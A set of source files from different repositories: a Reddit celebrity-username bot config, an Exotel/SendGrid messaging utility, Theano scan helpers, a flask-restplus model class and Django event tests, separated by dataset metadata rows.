\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
RachelHurdWood = ("rachel", "hurdwood")
RachelHurdWoodReply = """
[Instagram](https://instagram.com/1rachelhurdwood/)\n
[Twitter](https://twitter.com/rachelhurdwood)\n
[Facebook](https://www.facebook.com/rachelhurdwood/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
TiannaGregory = ("tianna", "gregory")
TiannaGregoryReply = """
Snapchat: TiannaGregory
[Instagram](https://instagram.com/_tiannag/)\n
[Twitter](https://twitter.com/_TiannaG)\n
[Tumblr](http://tnutty.tumblr.com/)\n
[Facebook](https://www.facebook.com/pages/Tianna-Gregory/585670294906217)\n
[Website](http://www.tiannagregory.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
PaigeSpiranac = ("paige", "spiranac")
PaigeSpiranacReply = """
[Instagram](https://instagram.com/_paige.renee/)\n
[Twitter](https://twitter.com/PaigeSpiranac)\n
[Facebook](https://www.facebook.com/paigereneespiranac)\n
[Website](http://paigespiranac.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
GeorgiaMayJagger = ("georgia", "may", "jagger")
GeorgiaMayJaggerReply = """
[Instagram](https://instagram.com/georgiamayjagger/)\n
[Twitter](https://twitter.com/GeorgiaMJagger)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
BrookeBurke = ("brooke", "burke")
BrookeBurkeReply = """
[Instagram](https://instagram.com/brookeburke/)\n
[Twitter](https://twitter.com/BrookeBurke)\n
[Facebook](https://www.facebook.com/pages/Brooke-Burke/261925180496418)\n
[WhoSay](http://www.whosay.com/brookeburke)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
SydneyFullerMarr = ("sydney", "fuller", "marr")
SydneyFullerMarrReply = """
[Instagram](https://instagram.com/misssydneyfuller/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
# -start-
JennaJenovich = ("jenna", "jenovich")
JennaJenovichReply = """
Snapchat: jennajenovich
[Instagram](https://instagram.com/jennajenovich/)\n
[Twitter](https://twitter.com/JennaJenovich)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
OliviaJordan = ("olivia", "jordan")
OliviaJordanReply = """
[Instagram](https://instagram.com/theoliviajordan/)\n
[Twitter - personal](https://twitter.com/theOliviaJordan)\n
[Twitter - @MissUSA](https://twitter.com/missusa)\n
[Facebook](https://www.facebook.com/theoliviajordan)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
HannahPolites = ("hannah", "polites")
HannahPolitesReply = """
[Instagram](https://instagram.com/hannahpolites)\n
[Facebook](https://www.facebook.com/hannah.polites)\n
[Website](http://hannahpolites.com.au/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
DeniseMilani = ("denise", "milani")
DeniseMilaniReply = """
[Instagram](https://instagram.com/denisemilaniofficial/)\n
[Facebook](https://instagram.com/denisemilaniofficial/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KatherineTimokhina = ("catherine", "katherine", "timokhina")
KatherineTimokhinaReply = """
[Instagram](https://instagram.com/katrintim93/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
celebs = ({SelenaGomez: SelenaGomezReply}, {AlexisRen: AlexisRenReply}, {TaylorSwift: TaylorSwiftReply}, {McKaylaMaroney: McKaylaMaroneyReply},\
{SarahHyland: SarahHylandReply}, {ArielWinter: ArielWinterReply}, {KarlieKloss: KarlieKlossReply}, {KendallJenner: KendallJennerReply},\
{KylieJenner: KylieJennerReply}, {ChloeBennet: ChloeBennetReply}, {HayleyAtwell: HayleyAtwellReply}, {AnnaKendrick: AnnaKendrickReply},\
{DaniThorne: DaniThorneReply}, {BellaThorne: BellaThorneReply}, {EmiliaClarke: EmiliaClarkeReply}, {JessicaBiel: JessicaBielReply},\
{AshleyBenson: AshleyBensonReply}, {MelissaBenoist: MelissaBenoistReply}, {MilanaVayntrub: MilanaVayntrubReply}, {HeidiKlum: HeidiKlumReply},\
{StanaKatic: StanaKaticReply}, {BlakeLively: BlakeLivelyReply}, {MelissaDebling: MelissaDeblingReply}, {SarahShahi: SarahShahiReply},\
{IrinaShayk: IrinaShaykReply}, {MarinaNery: MarinaNeryReply}, {SandraRadav: SandraRadavReply}, {VanessaHudgens: VanessaHudgensReply},\
{KellyBrook: KellyBrookReply}, {MandyMoore: MandyMooreReply}, {AnnaFaith: AnnaFaithReply}, {LexieGrace: LexieGraceReply},\
{FrostSisters: FrostSistersReply}, {TaylorHannum: TaylorHannumReply}, {CaraDelevingne: CaraDelevingneReply}, {LenaGercke: LenaGerckeReply},\
{JenniferMorrison: JenniferMorrisonReply}, {MargotRobbie: MargotRobbieReply}, {AlyssaArce: AlyssaArceReply}, {MirandaKerr: MirandaKerrReply},\
{KarlieKloss: KarlieKlossReply}, {ElsaHosk: ElsaHoskReply}, {CandiceSwanepoel: CandiceSwanepoelReply}, {MeganFox: MeganFoxReply},\
{IzzyMarshall: IzzyMarshallReply}, {ArianaGrande: ArianaGrandeReply}, {NathalieEmmanuel: NathalieEmmanuelReply}, {HannahFerguson: HannahFergusonReply},\
{KateHudson: KateHudsonReply}, {NinaDobrev: NinaDobrevReply}, {DaphneJoy: DaphneJoyReply}, {EmilyRudd: EmilyRuddReply}, {OliviaCulpo: OliviaCulpoReply},\
{OdetteAnnable: OdetteAnnableReply}, {OlgaKurylenko: OlgaKurylenkoReply}, {CarolSeleme: CarolSelemeReply}, {AlessandraAmbrosio: AlessandraAmbrosioReply},\
{AlexSchmidt: AlexSchmidtReply}, {RachelHilbert: RachelHilbertReply}, {DevonWindsor: DevonWindsorReply}, {TaylorMarieHill: TaylorMarieHillReply},\
{KateMara: KateMaraReply}, {ChloeGraceMortz: ChloeGraceMortzReply}, {CamilleRowe: CamilleRoweReply}, {SammiHanratty: SammiHanrattyReply},\
{MargotRobbie: MargotRobbieReply}, {LaurenCohan: LaurenCohanReply}, {CamilaCabello: CamilaCabelloReply}, {YvonneStrahovski: YvonneStrahovskiReply},\
{OliviaMunn: OliviaMunnReply}, {KatharineMcphee: KatharineMcpheeReply}, {EmmaRoberts: EmmaRobertsReply}, {SalmaHayek: SalmaHayekReply},\
{KatyaEliseHenry: KatyaEliseHenryReply}, {ElizabethGillies: ElizabethGilliesReply}, {MichelleJenneke: MichelleJennekeReply}, {GwenCox: GwenCoxReply},\
{DakotaJohnson: DakotaJohnsonReply}, {CamillaLuddington: CamillaLuddingtonReply}, {JennaHopkins: JennaHopkinsReply}, {PriscillaQuintana: PriscillaQuintanaReply},\
{RachaelFinch: RachaelFinchReply}, {RachaelTaylor: RachaelTaylorReply}, {ElisabettaCanalis: ElisabettaCanalisReply}, {SolveigMorkHansen: SolveigMorkHansenReply},\
{AlyssaMilano: AlyssaMilanoReply}, {FrancoiseBoufhal: FrancoiseBoufhalReply}, {KimberleyGarner: KimberleyGarnerReply}, {CarlyCraig: CarlyCraigReply},\
{KarolinaKurkova: KarolinaKurkovaReply}, {LindsayHeyser: LindsayHeyserReply}, {RachelHurdWood: RachelHurdWoodReply}, {TiannaGregory: TiannaGregoryReply},\
{PaigeSpiranac: PaigeSpiranacReply}, {GeorgiaMayJagger: GeorgiaMayJaggerReply}, {BrookeBurke: BrookeBurkeReply}, {SydneyFullerMarr: SydneyFullerMarrReply},\
{JennaJenovich: JennaJenovichReply}, {OliviaJordan: OliviaJordanReply}, {HannahPolites: HannahPolitesReply}, {DeniseMilani: DeniseMilaniReply}, {KatherineTimokhina: KatherineTimokhinaReply})
#In this string put all+your+target_subreddits:
subreddits_string = "celeb_username_bot+Celeb_Bot_Test+DrewsephA"
#When the script is ready delete the above two lines and remove the "#" from the line below
#subreddits_string = "Celebs+CelebGfys+celebgifs+CelebsWallpaper+goddesses+VSModels+vsangels+Models+PrettyGirls+GirlswithGlasses+GirlswithGreenEyes+GirlswithWetHair+VictoriaSecret+VictoriasSecret+VSfans+WtSSTaDaMiT+starlets+girlsinyogapants+girlsinyogashorts+BeautifulFemales"
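# For reference: a "+"-joined string like the one above is the usual multireddit form
# that PRAW-style bots pass to reddit.subreddit(). A hypothetical sketch of how the
# main bot script (not part of this config file) might consume it:
#   for submission in reddit.subreddit(subreddits_string).stream.submissions():
#       title = submission.title.lower()
#       # ...check the keyword tuples in `celebs` against the title words...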
''' ---------------------------------------------------------------------------------------------------------------- '''
|
gpl-2.0
| 5,112,249,427,415,677,000
| 53.891648
| 276
| 0.689333
| false
| 2.353334
| false
| false
| false
|
mascot6699/Hackapi-Demo
|
src/core/utils.py
|
1
|
3280
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pprint import pprint
import requests
from django.conf import settings
from PyDictionary import PyDictionary
import wikipedia
import sendgrid
sid = settings.EXOTEL_SID
token = settings.EXOTEL_TOKEN
api = settings.SENDGRID_API_TOKEN
def send_message(sid, token, sms_from, sms_to, sms_body):
return requests.post('https://twilix.exotel.in/v1/Accounts/{sid}/Sms/send.json'.format(sid=sid),
auth=(sid, token),
data={
'From': sms_from,
'To': sms_to,
'Body': sms_body
})
if __name__ == '__main__':
r = send_message(sid, token,
sms_from='8050248326', # sms_from='8808891988',
sms_to='8050248326', # sms_to='9052161119',
sms_body='Some message is sent')
print r.status_code
pprint(r.json())
def process_wiki(word):
return wikipedia.summary(word)
def process_dictionary(word):
meaning = "You searched for the word {}. "
dictionary = PyDictionary(word)
our_meaning = dictionary.getMeanings()
meaning = meaning.format(our_meaning.keys()[0])
l = zip(our_meaning.values()[0].keys(),our_meaning.values()[0].values()[0])
for idx in l:
meaning += idx[0] + ":" + idx[1] + ", "
return meaning[:-1]
def custom_send_email(msg):
msg = msg.split(' ')
from_email = msg[0]
to_email = msg[1]
body = " ".join(msg[2:])
sg = sendgrid.SendGridClient(api)
message = sendgrid.Mail(to=to_email, subject="Urgent Emails", text=body, from_email=from_email)
status, msg = sg.send(message)
print "status", status
print "msg" ,msg
if status==200:
return "Email has been sent!"
else:
return "Email sending is delayed we are on it!"
return " "
def connect_customer(sid, token, customer_no, exotel_no, callerid, url, timelimit=None, timeout=None, calltype="trans",
callback_url=None):
return requests.post('https://twilix.exotel.in/v1/Accounts/{sid}/Calls/connect.json'.format(sid=sid),
auth=(sid, token),
data={
'From': customer_no,
'To': exotel_no,
'CallerId': callerid,
'Url': url,
'TimeLimit': timelimit,
'TimeOut': timeout,
'CallType': calltype,
'StatusCallback': callback_url
})
if __name__ == '__main__':
r = connect_customer(
sid, token,
customer_no="<Your-Customer's-Number>",
exotel_no="<Your-Exotel-Landline-or-Mobile>",
callerid="<Your-Exotel-virtual-number>",
url="http://my.exotel.in/exoml/start/<flow_id>",
timelimit="<time-in-seconds>", # This is optional
timeout="<time-in-seconds>", # This is also optional
calltype="trans", # Can be "trans" for transactional and "promo" for promotional content
callback_url="<http//: your company URL>" # This is also also optional
)
print r.status_code
pprint(r.json())
def get_help():
message = "8050248326 email from_email to_email body \n" \
"8050248326 dictionary term_to_search \n" \
"8050248326 wiki thing_to_search_in_wiki \n" \
"8050248326 song requested_song \n"
print message
return message
|
mit
| -5,266,229,043,800,101,000
| 30.854369
| 119
| 0.601524
| false
| 3.340122
| false
| false
| false
|
nke001/attention-lvcsr
|
libs/Theano/theano/sandbox/scan_module/scan_utils.py
|
1
|
16116
|
"""
This module provides utility functions for the Scan Op
See scan.py for details on scan
"""
from __future__ import print_function
__docformat__ = 'restructuredtext en'
__authors__ = ("Razvan Pascanu "
"Frederic Bastien "
"James Bergstra "
"Pascal Lamblin "
"Arnaud Bergeron")
__copyright__ = "(c) 2010, Universite de Montreal"
__contact__ = "Razvan Pascanu <r.pascanu@gmail>"
import copy
import logging
import warnings
import numpy
from six.moves import xrange
import theano
from theano.compat import izip
from theano.compile.pfunc import rebuild_collect_shared
from theano import gof
from theano import tensor, scalar
from theano.tensor.basic import get_scalar_constant_value
# Logging function for sending warning or info
_logger = logging.getLogger('theano.scan_utils')
def expand(tensor_var, size):
"""
Given ``tensor_var``, a Theano tensor of shape (d1, d2, ..), this
function constructs a rval Theano tensor of shape (d1 + size, d2, ..)
filled with 0s, except the first d1 entries which are taken from
``tensor_var``, namely:
rval[:d1] = tensor_var
:param tensor_var: Theano tensor variable
:param size: int
"""
# Corner case that I might use in an optimization
if size == 0:
return tensor_var
shapes = [tensor_var.shape[x] for x in xrange(tensor_var.ndim)]
zeros_shape = [size + shapes[0]] + shapes[1:]
empty = tensor.zeros(zeros_shape,
dtype=tensor_var.dtype)
return tensor.set_subtensor(empty[:shapes[0]], tensor_var)
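# Illustrative usage sketch (not exercised anywhere in this module): for a (3, 5)
# matrix input and size=2, the result is a (5, 5) tensor whose first 3 rows equal
# the input and whose last 2 rows are zeros, e.g.
#   x = tensor.matrix('x')
#   f = theano.function([x], expand(x, 2))
#   f(numpy.ones((3, 5), dtype=theano.config.floatX)).shape  # -> (5, 5)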
def to_list(ls):
"""
Converts ``ls`` to list if it is a tuple, or wraps ``ls`` into a list if
it is not a list already
"""
if isinstance(ls, (list, tuple)):
return list(ls)
else:
return [ls]
class until(object):
"""
Theano can end on a condition. In order to differentiate this condition
from the other outputs of scan, this class is used to wrap the condition
around it.
"""
def __init__(self, condition):
self.condition = tensor.as_tensor_variable(condition)
assert self.condition.ndim == 0
def get_updates_and_outputs(ls):
"""
Parses the list ``ls`` into outputs and updates. The semantics
of ``ls`` is defined by the constructive function of scan.
    The elements of ``ls`` are either a list of expressions representing the
outputs/states, a dictionary of updates or a condition.
"""
def is_list_outputs(elem):
if (isinstance(elem, (list, tuple)) and
all([isinstance(x, theano.Variable) for x in elem])):
return True
if isinstance(elem, theano.Variable):
return True
return False
def is_updates(elem):
if isinstance(elem, dict):
return True
# Dictionaries can be given as lists of tuples
if (isinstance(elem, (list, tuple)) and
all([isinstance(x, (list, tuple)) and len(x) == 2
for x in elem])):
return True
return False
def is_condition(elem):
return isinstance(elem, until)
if is_list_outputs(ls):
return None, to_list(ls), {}
if is_updates(ls):
return None, [], dict(ls)
if not isinstance(ls, (list, tuple)):
raise ValueError(('Scan can not parse the return value'
' of your constructive function given to scan'))
ls = list(ls)
deprecation_msg = ('The return value of the lambda function'
                       ' has been restricted. You have to always return first the'
' outputs (if any), afterwards the updates (if any) and'
' at the end the condition')
error_msg = ('Scan can not parse the return value of your constructive '
                 'function given to scan')
if len(ls) == 2:
if is_list_outputs(ls[0]):
if is_updates(ls[1]):
return (None, to_list(ls[0]), dict(ls[1]))
elif is_condition(ls[1]):
return (ls[1].condition, to_list(ls[0]), {})
else:
raise ValueError(error_msg)
elif is_updates(ls[0]):
            if is_list_outputs(ls[1]):
raise ValueError(deprecation_msg)
elif is_condition(ls[1]):
return (ls[1].condition, [], dict(ls[0]))
else:
raise ValueError(error_msg)
else:
raise ValueError(error_msg)
elif len(ls) == 3:
        if is_list_outputs(ls[0]):
if is_updates(ls[1]):
if is_condition(ls[2]):
return (ls[2].condition, to_list(ls[0]), dict(ls[1]))
else:
raise ValueError(error_msg)
else:
raise ValueError(error_msg)
else:
raise ValueError(error_msg)
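# Editor's note: illustrative sketch, not part of the original module. It shows
# the (condition, outputs, updates) triple that get_updates_and_outputs extracts
# from a typical inner-function return value of scan.
def _get_updates_and_outputs_example():
    x = tensor.scalar('x')
    acc = theano.shared(0.0, name='acc')
    y = x * 2
    condition, outputs, updates = get_updates_and_outputs(
        ([y], {acc: acc + x}, until(y > 10)))
    assert condition.ndim == 0
    assert len(outputs) == 1
    assert acc in updates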
def clone(output, replace=None, strict=True, share_inputs=True):
"""
Function that allows replacing subgraphs of a computational
graph. It returns a copy of the initial subgraph with the corresponding
substitutions.
:type output: Theano Variables (or Theano expressions)
    :param output: Theano expression that represents the computational
graph
:type replace: dict
:param replace: dictionary describing which subgraphs should be
replaced by what
:type share_inputs: bool
:param share_inputs: If True, use the same inputs (and shared variables)
as the original graph. If False, clone them. Note that cloned
shared variables still use the same underlying storage, so they
will always have the same value.
"""
inps, outs, other_stuff = rebuild_collect_shared(output,
[],
replace,
[],
strict,
share_inputs)
return outs
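# Editor's note: illustrative sketch, not part of the original module; it shows
# clone() substituting one input variable for another in an existing graph.
def _clone_usage_example():
    x = tensor.scalar('x')
    z = tensor.scalar('z')
    y = x ** 2 + 1
    y_of_z = clone(y, replace={x: z})
    # rebuild_collect_shared may hand the outputs back in a list.
    if isinstance(y_of_z, (list, tuple)):
        y_of_z = y_of_z[0]
    assert abs(y_of_z.eval({z: 3.0}) - 10.0) < 1e-4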
def canonical_arguments(sequences,
outputs_info,
non_sequences,
go_backwards,
n_steps):
"""
This re-writes the arguments obtained from scan into a more friendly
form for the scan_op.
Mainly it makes sure that arguments are given as lists of dictionaries,
    and that the different fields of a dictionary are set to a default
    value if the user has not provided any.
"""
states_info = to_list(outputs_info)
parameters = [tensor.as_tensor_variable(x) for x in to_list(non_sequences)]
inputs = []
if n_steps is not None:
negative_n_steps = tensor.lt(tensor.as_tensor_variable(n_steps), 0)
for input in to_list(sequences):
if not isinstance(input, dict):
nw_input = tensor.as_tensor_variable(input)
if go_backwards:
nw_input = nw_input[::-1]
if n_steps is not None:
nw_input = tensor.switch(negative_n_steps, nw_input[::-1],
nw_input)
inputs.append(tensor.as_tensor_variable(nw_input))
elif input.get('taps', True) is None:
nw_input = tensor.as_tensor_variable(input['input'])
if go_backwards:
nw_input = nw_input[::-1]
if n_steps is not None:
nw_input = tensor.switch(negative_n_steps, nw_input[::-1],
nw_input)
inputs.append(nw_input)
elif input.get('taps', None):
mintap = numpy.min(input['taps'])
maxtap = numpy.max(input['taps'])
orig_input = tensor.as_tensor_variable(input['input'])
if go_backwards:
orig_input = orig_input[::-1]
if n_steps is not None:
orig_input = tensor.switch(negative_n_steps, orig_input[::-1],
orig_input)
for k in input['taps']:
                # We cut the sequence such that seq[i] corresponds to
                # seq[i-k]
if maxtap < 0:
offset_max = abs(maxtap)
else:
offset_max = 0
if mintap < 0:
offset_min = abs(mintap)
else:
offset_min = 0
nw_input = orig_input
if maxtap == mintap and maxtap != 0:
if maxtap > 0:
nw_input = nw_input[maxtap:]
else:
nw_input = nw_input[:maxtap]
else:
st = k + offset_min
if maxtap > 0:
ed = - (maxtap + offset_min - st)
else:
ed = - (offset_min - st)
if ed != 0:
nw_input = nw_input[st:ed]
else:
nw_input = nw_input[st:]
inputs.append(nw_input)
else:
raise ValueError('Provided sequence makes no sense', str(input))
# Since we've added all sequences now we need to level them up based on
# n_steps or their different shapes
if n_steps is None:
if len(inputs) == 0:
# No information about the number of steps
raise ValueError('You need to provide either at least '
'one sequence over which scan should loop '
'or a number of steps for scan to loop. '
                             'Neither of the two has been provided!')
T = inputs[0].shape[0]
for input in inputs[1:]:
T = tensor.minimum(T, input.shape[0])
else:
T = abs(tensor.as_tensor(n_steps))
# Level up sequences
inputs = [input[:T] for input in inputs]
# wrap outputs info in a dictionary if they are not already in one
for i, state in enumerate(states_info):
if state is not None and not isinstance(state, dict):
states_info[i] = dict(initial=tensor.as_tensor_variable(state),
taps=[-1])
elif isinstance(state, dict):
if not state.get('initial', None) and state.get('taps', None):
raise ValueError(('If you are using slices of an output '
                                  'you need to provide an initial state '
'for it'), state)
elif state.get('initial', None) and not state.get('taps', None):
# initial state but taps not provided
if 'taps' in state:
# explicitly provided a None for taps
_logger.warning(
                    ('Output %s (index %d) has an initial '
'state but taps is explicitly set to None '),
getattr(states_info[i]['initial'], 'name', 'None'), i)
states_info[i]['taps'] = [-1]
states_info[i]['initial'] = \
tensor.as_tensor_variable(state['initial'])
elif state.get('initial', None):
states_info[i]['initial'] = \
tensor.as_tensor_variable(state['initial'])
else:
# if a None is provided as the output info we replace it
# with an empty dict() to simplify handling
states_info[i] = dict()
return inputs, states_info, parameters, T
def infer_shape(outs, inputs, input_shapes):
'''
Compute the shape of the outputs given the shape of the inputs
of a theano graph.
We do it this way to avoid compiling the inner function just to get
the shape. Changes to ShapeFeature could require changes in this function.
'''
# We use a ShapeFeature because it has all the necessary logic
# inside. We don't use the full ShapeFeature interface, but we
# let it initialize itself with an empty fgraph, otherwise we will
# need to do it manually
for inp, inp_shp in izip(inputs, input_shapes):
if inp_shp is not None and len(inp_shp) != inp.ndim:
assert len(inp_shp) == inp.ndim
shape_feature = tensor.opt.ShapeFeature()
shape_feature.on_attach(theano.gof.FunctionGraph([], []))
# Initialize shape_of with the input shapes
for inp, inp_shp in izip(inputs, input_shapes):
shape_feature.set_shape(inp, inp_shp)
def local_traverse(out):
'''
Go back in the graph, from out, adding computable shapes to shape_of.
'''
if out in shape_feature.shape_of:
# Its shape is already known
return
elif out.owner is None:
# This is an input of the graph
shape_feature.init_r(out)
else:
# Recurse over inputs
for inp in out.owner.inputs:
                if inp not in shape_feature.shape_of:
local_traverse(inp)
# shape_feature.on_import does not actually use an fgraph
# It will call infer_shape and set_shape appropriately
dummy_fgraph = None
shape_feature.on_import(dummy_fgraph, out.owner, reason="dummy")
ret = []
for o in outs:
local_traverse(o)
ret.append(shape_feature.shape_of[o])
return ret
def allocate_memory(T, y_info, y):
"""
Allocates memory for an output of scan.
:param T: scalar
Variable representing the number of steps scan will run
:param y_info: dict
Dictionary describing the output (more specifically describing shape
        information for the output)
:param y: Tensor variable
        Expression describing the computation resulting in one entry of y.
It can be used to infer the shape of y
"""
if 'shape' in y_info:
return tensor.zeros([T, ] + list(y_info['shape']),
dtype=y.dtype)
else:
inputs = gof.graph.inputs([y])
ins_shapes = []
for inp in inputs:
in_shape = [inp.shape[k] for k in xrange(inp.ndim)]
ins_shapes.append(in_shape)
shape = infer_shape([y], inputs, ins_shapes)[0]
return tensor.zeros([T, ] + shape, dtype=y.dtype)
class ScanPermutation(gof.Op):
def __init__(self, mintap=0, inplace=False):
self.inplace = inplace
self.mintap = mintap
if inplace:
self.destroy_map = {0: [0]}
def __eq__(self, other):
return type(self) == type(other) and self.inplace == other.inplace
def __hash__(self):
return hash(type(self)) ^ hash(self.inplace)
def __str__(self):
if self.inplace:
return "scan_permutation{inplace}"
else:
return "scan_permutation"
def make_node(self, membuffer, index):
# index has to be a scalar
assert index.ndim == 0
        # we need at least one dimension
assert membuffer.ndim > 0
return gof.Apply(self, [membuffer, index], [membuffer.type()])
def perform(self, node, inputs, outputs):
membuffer = inputs[0]
index = inputs[1] + self.mintap
out = outputs[0]
if index % membuffer.shape[0] == 0:
if self.inplace:
out[0] = membuffer
else:
out[0] = membuffer.copy()
else:
pos = index % membuffer.shape[0]
if outputs[0] is membuffer:
membuffer = membuffer.copy()
print(pos)
out[0][:membuffer.shape[0] - pos] = membuffer[pos:]
out[0][membuffer.shape[0] - pos:] = membuffer[:pos]
def R_op(self, inputs, eval_points):
if eval_points[0] is None:
return [None]
return self.make_node(eval_points[0], inputs[1]).outputs
def grad(self, inputs, grads):
pos = inputs[0].shape[0] - (inputs[1] % inputs[0].shape[0])
return self.make_node(grads[0], pos).outputs
|
mit
| 8,171,401,141,584,045,000
| 36.2194
| 79
| 0.548089
| false
| 4.206735
| false
| false
| false
|
luminusnetworks/flask-restplus
|
flask_restplus/model.py
|
1
|
3749
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import copy
import re
from collections import MutableMapping
from six import iteritems, itervalues
from werkzeug import cached_property
from flask.ext.restful import abort
from jsonschema import Draft4Validator
from jsonschema.exceptions import ValidationError
from .utils import not_none
RE_REQUIRED = re.compile(r'u?\'(?P<name>.*)\' is a required property', re.I | re.U)
def instance(cls):
if isinstance(cls, type):
return cls()
return cls
class ApiModel(dict, MutableMapping):
'''A thin wrapper on dict to store API doc metadata'''
def __init__(self, *args, **kwargs):
self.__apidoc__ = {}
self.__parent__ = None
super(ApiModel, self).__init__(*args, **kwargs)
@cached_property
def resolved(self):
'''
Resolve real fields before submitting them to upstream restful marshal
'''
# Duplicate fields
resolved = copy.deepcopy(self)
# Recursively copy parent fields if necessary
if self.__parent__:
resolved.update(self.__parent__.resolved)
# Handle discriminator
candidates = [f for f in itervalues(resolved) if getattr(f, 'discriminator', None)]
        # Ensure there is only one discriminator
if len(candidates) > 1:
raise ValueError('There can only be one discriminator by schema')
        # Ensure the discriminator always outputs the model name
elif len(candidates) == 1:
candidates[0].default = self.__apidoc__['name']
return resolved
@property
def ancestors(self):
'''
Return the ancestors tree
'''
return self.__parent__.tree
@cached_property
def tree(self):
'''
Return the inheritance tree
'''
tree = [self.__apidoc__['name']]
return self.ancestors + tree if self.__parent__ else tree
@property
def name(self):
return self.__apidoc__['name']
def get_parent(self, name):
if self.name == name:
return self
elif self.__parent__:
return self.__parent__.get_parent(name)
else:
raise ValueError('Parent ' + name + ' not found')
@cached_property
def __schema__(self):
properties = {}
required = set()
discriminator = None
for name, field in iteritems(self):
field = instance(field)
properties[name] = field.__schema__
if field.required:
required.add(name)
if getattr(field, 'discriminator', False):
discriminator = name
schema = not_none({
'required': sorted(list(required)) or None,
'properties': properties,
'discriminator': discriminator,
})
if self.__parent__:
return {
'allOf': [
{'$ref': '#/definitions/{0}'.format(self.__parent__.name)},
schema
]
}
else:
return schema
def validate(self, data, resolver=None):
validator = Draft4Validator(self.__schema__, resolver=resolver)
try:
validator.validate(data)
except ValidationError:
abort(400, message='Input payload validation failed',
errors=dict(self.format_error(e) for e in validator.iter_errors(data)))
def format_error(self, error):
path = list(error.path)
if error.validator == 'required':
name = RE_REQUIRED.match(error.message).group('name')
path.append(name)
key = '.'.join(str(p) for p in path)
return key, error.message
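# Editor's note: illustrative sketch, not part of the original module. A minimal
# stand-in field object is enough to show how ApiModel derives its JSON schema;
# real code would use flask-restplus field instances instead of _DummyField.
def _api_model_schema_example():
    class _DummyField(object):
        required = True
        __schema__ = {'type': 'string'}
    model = ApiModel(name=_DummyField())
    model.__apidoc__['name'] = 'Person'
    schema = model.__schema__
    assert schema['required'] == ['name']
    assert schema['properties']['name'] == {'type': 'string'}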
|
mit
| 9,132,711,310,193,059,000
| 28.289063
| 91
| 0.572153
| false
| 4.538741
| false
| false
| false
|
sthzg/django-chatterbox
|
chatterbox/tests/test_events.py
|
1
|
3069
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.test.testcases import SimpleTestCase
from chatterbox.events import BaseChatterboxEvent
from .helpers import MailEventDummyClass, get_test_dict
class BaseChatterboxTests(SimpleTestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_add_template(self):
""" ``add_template()`` stores passed values as expected.
"""
be = BaseChatterboxEvent()
be.add_template('foo', 'chatterbox_tests/empty_foo.html')
be.add_template('bam', 'chatterbox_tests/empty_bar.html')
self.assertEqual(len(be.templates), 2)
self.assertTrue('foo' in be.templates)
self.assertTrue('bam' in be.templates)
self.assertTrue(be.templates.get('foo') == 'chatterbox_tests/empty_foo.html') # NOQA
def test_add_token(self):
""" ``add_token`` yields the expected data structure.
"""
be = BaseChatterboxEvent()
be.add_token('bam', 'baz')
be.add_token('actor.foo', 42)
be.add_token('bar.baz.boo.jap', 'jahu')
self.assertEqual(be._tokens['bam'], 'baz')
self.assertEqual(be._tokens['actor']['foo'], 42)
self.assertEqual(be._tokens['bar']['baz']['boo']['jap'], 'jahu')
def test_add_nested_token_on_leaf_raises(self):
# TODO(sthzg) implement
# be = BaseChatterboxEvent()
# be.add_token('bam', 'baz')
# be.add_token('bam.foo', 42)
pass
